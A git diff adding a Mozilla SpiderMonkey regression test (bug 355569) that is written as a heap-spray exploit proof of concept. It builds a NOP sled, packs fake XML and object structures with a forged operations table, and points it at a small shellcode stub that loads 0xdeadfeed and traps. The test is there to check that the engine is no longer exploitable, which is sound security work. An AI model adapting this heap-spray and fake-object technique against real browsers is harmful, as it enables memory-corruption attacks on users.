diff options
Diffstat (limited to 'js/src/tests/js1_8_5/regress/regress-355569.js')
-rw-r--r-- | js/src/tests/js1_8_5/regress/regress-355569.js | 127 |
1 files changed, 127 insertions, 0 deletions
diff --git a/js/src/tests/js1_8_5/regress/regress-355569.js b/js/src/tests/js1_8_5/regress/regress-355569.js new file mode 100644 index 000000000..b14c83cb6 --- /dev/null +++ b/js/src/tests/js1_8_5/regress/regress-355569.js @@ -0,0 +1,127 @@ +/* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */ + +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +var bug = 355569; +var actual = ''; +var expect = ''; + +printBugNumber (bug); +printStatus (summary); + +var targetAddress = 0x12030010; +var sprayParams = { + chunkSize: 16 * 1024 * 1024, + chunkCount: 16, + chunkMarker: 0xdeadface, + chunkAlign: 0x1000, + reservedSize: 1024 +}; + +function makeExploitCode() { + /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */ + return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2"; +} + +/*==========================================================================*/ +/*==========================================================================*/ + +function packData(template, A) { + var n = 0, result = "", vl; + for(var i = 0; i < template.length; i++) { + var ch = template.charAt(i); + if(ch == "s" || ch == "S") { + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff); + } else if(ch == "l" || ch == "L") { // XXX endian + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16); + } else if(ch == "=") { + result += String(A[n++]); + } + } + return result; +} +function buildStructure(worker, address) { + var offs = {}, result = "", context = { + append: function(k, v) { offs[k] = result.length * 2; result += v; }, + address: function(k) { return address + ((k && offs[k]) || 0); } + }; worker(context); result = ""; worker(context); return result; +} +function repeatToLength(s, L) { + if(L <= s.length) { return s.substring(0, L); } + while(s.length <= L/2) { s += s; } + return s + s.substring(0, L - s.length); +} +function sprayData(data, params, rooter) { + var marker = packData("L", [ params.chunkMarker ]); + data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length); + data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2); + for(var i = 0; i < params.chunkCount; i++) { + rooter[i] = marker + data + i; + } +} + +function T_JSObject(map, slots) +{ return packData("LL", arguments); } +function T_JSObjectMap(nrefs, ops, nslots, freeslot) +{ return packData("LLLL", arguments); } +function T_JSObjectOps( + newObjectMap, destroyObjectMap, lookupProperty, defineProperty, + getProperty, setProperty, getAttributes, setAttributes, + deleteProperty, defaultValue, enumerate, checkAccess, + thisObject, dropProperty, call, construct, + xdrObject, hasInstance, setProto, setParent, + mark, clear, getRequiredSlot, setRequiredSlot +) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); } + +function T_JSXML_LIST( + object, domnode, parent, name, xml_class, xml_flags, + kids_length, kids_capacity, kids_vector, kids_cursors, + xml_target, xml_targetprop +) { return packData("LLLLSS LLLL LL", arguments); } +function T_JSXML_ELEMENT( + object, domnode, parent, name, xml_class, xml_flags, + kids_length, kids_capacity, kids_vector, kids_cursors, + nses_length, nses_capacity, nses_vector, nses_cursors, + atrs_length, atrs_capacity, atrs_vector, atrs_cursors +) { return packData("LLLLSS LLLL LLLL LLLL", arguments); } + +/*==========================================================================*/ +/*==========================================================================*/ + +function makeExploitData(address) { + return buildStructure(function(ctx) { + ctx.append("xml-list", + T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0)); + ctx.append("xml-kids-vector", + packData("L", [ ctx.address("xml-element") ])); + ctx.append("xml-element", + T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0)); + ctx.append("object", + T_JSObject(ctx.address("object-map"), 0)); + ctx.append("object-map", + T_JSObjectMap(0, ctx.address("object-ops"), 0, 0)); + ctx.append("object-ops", + T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0)); + ctx.append("exploit-code", + makeExploitCode(ctx)); + }, address); +} + +function exploit() { + sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {}); + var numobj = new Number(targetAddress >> 1); + printStatus("probably not exploitable"); +} + +try +{ + exploit(); +} +catch(ex) +{ +} + +reportCompare(expect, actual); + |